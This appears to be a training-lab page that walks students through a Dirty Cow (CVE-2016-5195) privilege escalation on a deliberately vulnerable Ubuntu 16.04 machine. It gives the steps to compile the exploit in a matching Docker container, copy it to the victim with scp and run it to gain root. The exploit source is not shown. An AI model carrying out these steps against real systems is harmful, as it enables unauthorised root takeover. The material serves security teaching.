Difficulty
intermediate
Average duration
2 hrs
Solution code
Technologies
linux
cybersecurity
penetration testing
red team
kernel exploit
Difficulty
intermediate
Average duration
2 hrs
Solution code
Technologies
linux
cybersecurity
penetration testing
red team
kernel exploit
The academy provides a virtual machine with a vulnerable version of Ubuntu Server (16.04.1), running a kernel affected by the Dirty Cow vulnerability (CVE-2016-5195).
As a student, you already have access to this system with a limited user called student
. Your goal will be to identify that the system is vulnerable, compile and run a real exploit, and escalate your privileges to gain root access. This exercise simulates a realistic scenario where a local attacker, without administrative privileges, fully compromises the system by exploiting a kernel vulnerability. The objectives are:
g++
, a compiler used to build and link programs written in C++, generating an executable from the source code.root
./root
.This type of exploitation is typical in advanced security audits and Red Team environments. It will help you connect low-level operating system concepts with real offensive techniques, in a practical and guided way.
Vulnerable Ubuntu machine with kernel 4.4.0-21-generic
(or similar unpatched)
Access as a non-privileged user on the vulnerable machine (student:password123
)
Kali Linux machine (Attacker). This is the machine where you will prepare the exploit, and it must have the following tools installed:
🔧 Docker
: We will use Docker to launch an Ubuntu 16.04 container and compile the exploit with the same libraries as the victim machine. This ensures compatibility and avoids errors due to modern compiler or glibc
versions.
🔧 g++
: This is the C++ compiler. We will use it to compile the dirty.cpp
exploit, which is written in this language. It allows us to generate an executable (dirty
) from the source code.
🔧 scp
(Secure Copy Protocol): This is a tool for securely copying files between Linux systems. We will use it to transfer the compiled exploit from Kali to the victim machine.
🚨 Legal Notice: This repository contains a clean and commented version of the Dirty Cow exploit (CVE-2016-5195), designed exclusively for educational purposes. This variant creates a new user with root privileges by exploiting a race condition in the Linux kernel memory subsystem. This exploit is for educational use only. It must be used in controlled and legal environments, such as labs, practice virtual machines, or cybersecurity classes.
Log in to the vulnerable machine with the limited user and run:
1uname -a
This returns something like:
1Linux dirtycow-lab 4.4.0-31-generic #50-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016 x86_64 x86_64 x86_64
Note the version and research how to exploit that vulnerability using databases like Exploit-DB, GitHub, or searchsploit from Kali. For this exercise, we provide you with a functional and documented exploit that you can download here.
⚠️ IMPORTANT! The vulnerable machine does not have compilation tools installed, nor
sudo
permissions to add them. Therefore, we must compile the exploit on Kali, inside a Docker container with Ubuntu 16.04, which has the same versions of glibc, libstdc++, and system libraries as the vulnerable machine; otherwise, you may encounter version issues.
Install Docker on Kali:
1sudo apt update 2sudo apt install docker.io -y 3sudo systemctl start docker 4sudo systemctl enable docker
Download the Ubuntu 16.04 image:
1sudo docker pull ubuntu:16.04
Launch a container:
1sudo docker run -it --name compile-ubuntu16 ubuntu:16.04
Install compilation tools:
1apt update 2apt install build-essential libutil-dev -y
Create the file inside the container:
1nano dirty.cpp
(Paste the full exploit code from dirty.cpp provided by the academy or from Exploit-DB 40847)
Compile the binary:
1g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirty dirty.cpp -lutil
Exit the container:
1exit
Copy the compiled binary from the container to Kali:
1sudo docker cp compile-ubuntu16:/dirty ./dirty
Transfer the binary to the victim:
1scp dirty student@<VICTIM_IP>:/home/student
On the victim, run it:
1chmod +x dirty 2./dirty
If the exploit is successful, you will see a message telling you the password assigned to the root user.
root
user./root/flag.txt
directory. If everything worked correctly, you will see the flag's content.Difficulty
intermediate
Average duration
2 hrs
Solution code
Technologies
linux
cybersecurity
penetration testing
red team
kernel exploit
Difficulty
intermediate
Average duration
2 hrs
Solution code
Technologies
linux
cybersecurity
penetration testing
red team
kernel exploit
Difficulty
intermediate
Average duration
2 hrs
Solution code
Technologies
linux
cybersecurity
penetration testing
red team
kernel exploit
Difficulty
intermediate
Average duration
2 hrs
Solution code
Technologies
linux
cybersecurity
penetration testing
red team
kernel exploit
Difficulty
intermediate
Average duration
2 hrs
Solution code
Technologies
linux
cybersecurity
penetration testing
red team
kernel exploit
Difficulty
intermediate
Average duration
2 hrs
Solution code
Technologies
linux
cybersecurity
penetration testing
red team
kernel exploit